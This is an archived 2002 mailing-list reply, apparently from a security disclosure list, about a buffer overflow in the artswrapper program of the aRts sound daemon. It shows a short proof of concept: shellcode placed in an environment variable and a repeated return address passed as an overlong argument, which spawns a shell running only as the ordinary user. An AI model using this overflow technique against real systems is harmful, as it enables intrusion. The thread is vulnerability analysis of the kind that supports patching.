Re: artsd overflow

From: Charles 'core' Stevenson (coreat_private)
Date: Thu Jan 03 2002 - 23:18:08 PST

Next message: Erwin Geirnaert: "RE: Vuln in Verisign PayFlow Link payment service"

Previous message: jon schatz: "Re: Vuln in Verisign PayFlow Link payment service"
In reply to: Fuska: "artsd overflow"
Next in thread: castongjat_private: "Re: artsd overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Fuska wrote:
> r00t:~$ artswrapper -m `perl -e 'print "A"x3000'`
> >> running as realtime process now (priority 50)
> Segmentation fault
> 
>   Is this exploitable?
core@euclid:~/tmp$ export EXECSHELL=`./execve_ppc`
...
core@euclid:~/tmp$ artswrapper -m `perl -e 'print
"\x7f\xff\xfe\x10"x750;'`
>> running as realtime process now (priority 50)
sh-2.05a$ id
uid=1000(core) gid=1000(core) groups=1000(core)
sh-2.05a$ Alarm clock

Not directly at least...

peace,
core

Next message: Erwin Geirnaert: "RE: Vuln in Verisign PayFlow Link payment service"
Previous message: jon schatz: "Re: Vuln in Verisign PayFlow Link payment service"
In reply to: Fuska: "artsd overflow"
Next in thread: castongjat_private: "Re: artsd overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jan 04 2002 - 10:07:21 PST